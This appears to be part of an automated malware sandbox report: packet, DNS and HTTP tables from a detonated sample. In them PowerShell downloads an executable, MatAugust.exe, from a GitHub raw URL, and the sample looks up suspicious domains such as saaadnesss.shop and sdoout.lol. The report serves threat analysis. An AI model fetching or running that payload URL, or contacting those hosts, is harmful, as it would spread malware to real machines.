                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.481370926 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.488627911 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.584958076 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.593050003 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.593099117 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.593137026 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.593461037 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.600639105 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.704817057 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.729927063 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.729968071 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.729996920 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.730223894 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.736080885 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.846121073 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.884614944 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.891731024 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.891876936 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.891886950 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.891968012 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:44.897924900 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.010077000 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.039297104 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.039330006 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.039341927 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.039791107 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.045768023 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.148907900 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.179542065 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.179553032 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.179557085 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.180003881 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.185410976 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.291544914 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.307540894 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.307641029 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.307653904 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.307868004 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.313813925 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.413358927 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.424360037 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.424369097 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.424388885 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.424618959 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.430632114 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.542471886 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.572282076 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.603096962 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.603231907 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.603261948 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.603547096 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.609144926 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.755357981 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.779936075 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.779947042 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.779954910 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.780219078 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.786947966 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.891060114 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.919997931 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.932662964 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.932929993 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.933008909 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.933249950 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:45.948647976 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.065993071 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.066102982 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.092380047 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.121143103 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.121155977 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.121165991 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.121494055 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.177948952 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.186747074 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.261122942 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.261231899 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.263119936 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.292200089 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.314883947 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.314934969 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.314945936 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.314959049 CET4435281423.209.72.29192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.319118977 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.319241047 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.330810070 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.380384922 CET52814443192.168.2.523.209.72.29
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:46.444139957 CET4435281423.209.72.29192.168.2.5

                                                                                                                                                                                                                                                                                            ICMP Packets

                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:23.806865931 CET192.168.2.51.1.1.1c2a0(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.541980982 CET192.168.2.51.1.1.10xecdaStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:16.800232887 CET192.168.2.51.1.1.10x7b66Standard query (0)ifconfig.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:17.866674900 CET192.168.2.51.1.1.10x7a8bStandard query (0)saaadnesss.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:24.459477901 CET192.168.2.51.1.1.10xb001Standard query (0)GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:42.667833090 CET192.168.2.51.1.1.10xadacStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:43.587719917 CET192.168.2.51.1.1.10xd981Standard query (0)sdoout.lolA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:54.463959932 CET192.168.2.51.1.1.10x4478Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:54.464190960 CET192.168.2.51.1.1.10xf58eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:57.537161112 CET192.168.2.51.1.1.10xd290Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:57.537367105 CET192.168.2.51.1.1.10x3b28Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:58.624336004 CET192.168.2.51.1.1.10xd9d7Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:58.624515057 CET192.168.2.51.1.1.10x4140Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:19.330558062 CET192.168.2.51.1.1.10x456fStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:19.330679893 CET192.168.2.51.1.1.10x842aStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:20.224791050 CET192.168.2.51.1.1.10xf26fStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:20.225227118 CET192.168.2.51.1.1.10xc0a5Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.593203068 CET192.168.2.51.1.1.10x25e4Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.594018936 CET192.168.2.51.1.1.10x54c7Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.602122068 CET192.168.2.51.1.1.10xe8caStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.602225065 CET192.168.2.51.1.1.10x258bStandard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.611155033 CET192.168.2.51.1.1.10x585bStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.611428022 CET192.168.2.51.1.1.10x24acStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.613662004 CET192.168.2.51.1.1.10x36a0Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.613802910 CET192.168.2.51.1.1.10xd192Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:22.417248964 CET192.168.2.51.1.1.10x73bcStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:22.417665005 CET192.168.2.51.1.1.10xf0c2Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.197351933 CET192.168.2.51.1.1.10xd76bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.197520018 CET192.168.2.51.1.1.10x4d7Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.197870016 CET192.168.2.51.1.1.10x556eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.197999001 CET192.168.2.51.1.1.10xbda0Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.225389004 CET192.168.2.51.1.1.10xae44Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.225519896 CET192.168.2.51.1.1.10x548Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.548871994 CET1.1.1.1192.168.2.50xecdaNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.548871994 CET1.1.1.1192.168.2.50xecdaNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.548871994 CET1.1.1.1192.168.2.50xecdaNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.548871994 CET1.1.1.1192.168.2.50xecdaNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:16.807080984 CET1.1.1.1192.168.2.50x7b66No error (0)ifconfig.me34.160.111.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:17.873831987 CET1.1.1.1192.168.2.50x7a8bNo error (0)saaadnesss.shop185.121.235.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:24.474286079 CET1.1.1.1192.168.2.50xb001Name error (3)GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:42.674844980 CET1.1.1.1192.168.2.50xadacNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:43.601125002 CET1.1.1.1192.168.2.50xd981No error (0)sdoout.lol116.203.14.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:54.470803976 CET1.1.1.1192.168.2.50xf58eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:54.470844030 CET1.1.1.1192.168.2.50x4478No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:57.543962002 CET1.1.1.1192.168.2.50xd290No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:57.543962002 CET1.1.1.1192.168.2.50xd290No error (0)plus.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:57.544512033 CET1.1.1.1192.168.2.50x3b28No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:58.631262064 CET1.1.1.1192.168.2.50xd9d7No error (0)play.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:19.337450981 CET1.1.1.1192.168.2.50x456fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:19.337836027 CET1.1.1.1192.168.2.50x842aNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:19.343095064 CET1.1.1.1192.168.2.50xd447No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:19.343095064 CET1.1.1.1192.168.2.50xd447No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:19.343986034 CET1.1.1.1192.168.2.50x2821No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:20.231990099 CET1.1.1.1192.168.2.50xf26fNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:20.231997013 CET1.1.1.1192.168.2.50xc0a5No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.600209951 CET1.1.1.1192.168.2.50x25e4No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.600209951 CET1.1.1.1192.168.2.50x25e4No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.600209951 CET1.1.1.1192.168.2.50x25e4No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.600209951 CET1.1.1.1192.168.2.50x25e4No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.608978033 CET1.1.1.1192.168.2.50xe8caNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.609669924 CET1.1.1.1192.168.2.50x258bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.618009090 CET1.1.1.1192.168.2.50x24acNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.618247032 CET1.1.1.1192.168.2.50x585bNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.620553017 CET1.1.1.1192.168.2.50x36a0No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:21.620604038 CET1.1.1.1192.168.2.50xd192No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:22.424343109 CET1.1.1.1192.168.2.50x73bcNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:22.424343109 CET1.1.1.1192.168.2.50x73bcNo error (0)googlehosted.l.googleusercontent.com142.250.186.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:22.428122997 CET1.1.1.1192.168.2.50xf0c2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:23.992980003 CET1.1.1.1192.168.2.50xa22fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:23.992980003 CET1.1.1.1192.168.2.50xa22fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.204466105 CET1.1.1.1192.168.2.50x556eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.204466105 CET1.1.1.1192.168.2.50x556eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.204479933 CET1.1.1.1192.168.2.50x4d7No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.204606056 CET1.1.1.1192.168.2.50xd76bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.204606056 CET1.1.1.1192.168.2.50xd76bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.204840899 CET1.1.1.1192.168.2.50xbda0No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.232106924 CET1.1.1.1192.168.2.50x548No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.232117891 CET1.1.1.1192.168.2.50xae44No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:59:24.232117891 CET1.1.1.1192.168.2.50xae44No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                            • raw.githubusercontent.com
                                                                                                                                                                                                                                                                                            • ifconfig.me
                                                                                                                                                                                                                                                                                            • saaadnesss.shop
                                                                                                                                                                                                                                                                                            • t.me
                                                                                                                                                                                                                                                                                            • sdoout.lol
                                                                                                                                                                                                                                                                                            • www.google.com
                                                                                                                                                                                                                                                                                            • apis.google.com
                                                                                                                                                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                            • https:
                                                                                                                                                                                                                                                                                              • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                              • c.msn.com
                                                                                                                                                                                                                                                                                              • browser.events.data.msn.com

                                                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            0192.168.2.549704185.199.109.1334434956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC212OUTGET /rk2026/civil/refs/heads/main/MatAugust.exe HTTP/1.1
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Content-Length: 1171058
                                                                                                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                            ETag: "ff861616fd9c47b532576495e63c10802b96d5934d66335082058c4a8341c3a3"
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                            X-GitHub-Request-Id: 4378:D3840:157990B:1809150:67741492
                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:11 GMT
                                                                                                                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                                                                                                                            X-Served-By: cache-ewr-kewr1740020-EWR
                                                                                                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                            X-Timer: S1735660691.121598,VS0,VE18
                                                                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                            X-Fastly-Request-ID: b9526dfcdd6a64ed1074c0cf597be392ab648232
                                                                                                                                                                                                                                                                                            Expires: Tue, 31 Dec 2024 16:03:11 GMT
                                                                                                                                                                                                                                                                                            Source-Age: 0
